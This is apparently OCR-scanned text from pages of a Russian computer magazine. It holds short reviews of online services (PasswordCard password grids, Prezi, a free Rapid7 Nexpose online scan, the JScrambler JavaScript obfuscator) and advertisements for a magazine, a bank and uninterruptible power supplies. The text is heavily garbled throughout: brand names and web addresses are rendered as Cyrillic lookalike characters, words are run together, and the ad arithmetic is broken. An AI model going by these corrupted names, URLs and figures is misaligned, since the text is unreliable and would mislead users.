удержать в голове пароли для всех сервисов сразу! Чтобы побороть жела- 
ние везде использовать один итотже пасс, есть несколько выходов. Да, 
можно доверить пароли какому-то стороннему сервису, обращаясь к нему 
как к шпаргалке. А можно пойти на маленькую хитрость. Идея заключает- 
ся в использовании так называемой РаззѵѵогбСагб — небольшой карточ- 
ки стаблицей символов, которую часто выдают клиентам онлайн-банка 
в финансовыхучреждениях. Каждая строка таблицы имеетсвой цвет, а 
каждый столбец обозначен запоминающимся символом. Выбраводну из 
пар «цвет-символ», мы получаем первый символ пароля, а дальше для 
его составления используем какой-нибудь простой принцип, например, 
выписываем символы по диагонали. В результате получается надежный 
пароль, требующий минимум информации для за поминания, и карточка, 
которую можно безопасно держать при себе. Сгенерироватьуникальную 
карточку по ключевому слову как раз и поможет сервис РаззѵѵогбСагб. 



Создаем эффектные 
презентации 



РВЕ2І 

ѵѵѵѵѵѵ.ргегі.сопп 

Когда ребята из МісгозоД нахваливают новые эффекты, которые появи- 
лись в РоѵѵегРоіпІ: 201 0 для создания презентаций, в ответ остается толь- 
ко улыбаться. Видели бы они презенташки, которые позволяет создать 
онлайн-сервис РгеД :]. В основе сервиса лежит одна очень простая идея: 
все данные для слайдов размещаются на одном очень большом полотне, 
а переход между слайдами осуществляется с помощью эффектного 
перемещенияточки обзора. При необходимости камера, смотрящая 
на это полотно, отдаляется, чтобы показать больше информации, или 
приближается, чтобы акцентировать внимание на некоторые детали. 
Эффективность та кой презентации сложно передать словами, но если 
ты посмотришь примеры на сайте.тосразузахочешьиспользоватьее, 
чтобы с лучшей стороны представить свой курсач, диплом или, возможно, 
проект ста рта па для венчурного инвестора :]. 
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Коммерческий сканер 
безопасности онлайн 



ВАРЮ7 ОКіиЫЕ 5САЫ 

гарИ7.сотЛгее5сагц5р 



Компания Ра ріеі 7, специализирующая на информационной безопас- 
ности, известна тем, что приобрела проект МеіазрІоМ; и вкладывает 
в него большие деньги. Вместе с тем, главным проектом компании 
остается сканер безопасности РарісІ7 ЫеХрозе. Несмотря на то, что 
продукт продается за большие деньги (хотя у него и есть урезанная бес- 
платная версия], каждый может попробовать его в действии, натравив 
на серверы своей компании (да-да-да). Зарегистрировавшись на сайте, 
ты получаешь возможность просканировать онлайн- версией сканера 
два хоста. При этом ничего устанавливать не потребуется, весь софт 
работает на стороне разработчиков. Сканирование можетзанять неко- 
торое время, нотебедаже необязательно ждать: просто зайди в личный 
кабинет через некоторое время и ищи подробный отчет о сканировании 
в разделе Нерогіз. 




^СКАМВІ_ЕК 

мѵѵѵЩзсгатЫег.сопп 

На своей ежегодной конференции боодіе 1/0 сотрудники поискового 
гиганта заявили: с 2004 года не выходило ни одной значимой десктопной 
программы. Подкрепляя свои слова об абсолютном превосходстве веб- 
платформы, они даже открыли магазин для продажи онлайн-приложений 
(он пока доступен только корпоративным пользователям боодіе]. Но 
если для защиты десктопных программ существует немало крипторов и 
обфускаторов.то защитить клиентскую часть веб-приложения, написан- 
ную, как правило, на Эаѵабсгірі, довольно сложно. Чтобы уберечь сорцы 
от плагиата, приходится применять так называемые скрамблеры, которые 
чрезвычайноусложняют чтение кода. Существует много бестолковых ре- 
шений, но вот-вот появится достойный обфускатор — проектЭЗсгаітіЫег. 
Разработчики уже сейчас предлагают бета-тестерам несколько уникаль- 
ных алгоритмов, с помощью которых скрамблер делаетсорцы нечитаемы- 
ми. Да, открытый доступ пока закрыт, но разработчики активно рассылают 
приглашения по первому запросу. 
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Наш РС никогда не висит! 




МАХІМ 

МУЖСКОЙ ЖУРНАЛ С ИМЕНЕМ 



А 



Альфа-Банк 



(дате)іаіиі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно для регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 
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ОѴЭ плеер 

3500 ,- 



1 7000 + 3500 + 69500 = 9000С 

При скачке напряжения жизнь 
домашней техники может 
закончится внезапно... 



РУб. 



1 7000 + 3500 + 69500 

Ірроп сохраняет ваши деньги 



источники бесперебойного питания 



Источник бесперебойного питания 

Васк Ѵегзо 





